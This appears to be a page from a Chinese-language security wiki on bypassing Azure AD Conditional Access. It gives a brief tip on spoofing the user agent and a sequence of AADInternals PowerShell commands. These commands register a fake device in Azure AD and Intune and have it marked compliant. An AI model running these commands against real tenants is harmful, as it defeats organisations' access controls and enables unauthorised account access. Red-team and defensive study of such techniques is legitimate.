> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/yun-an-quan/azure/tiao-jian-fang-wen.md).

# 条件访问

```
通过复制用户代理绕过条件访问（Chrome 开发工具 > 选择 iPad Pro 等）
通过伪造设备合规性绕过条件访问
AAD Internals - 使您的设备兼容
获取 AAD 加入的访问令牌并保存到缓存
Get-AADIntAccessTokenForAADJoin -SaveToCache
将设备加入 Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
标记设备兼容 - 选项 1：将设备注册到 Intune
获取 Intune MDM 的访问令牌并保存到缓存（提示输入凭据）
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 
将设备加入 Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
开始回调
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
```
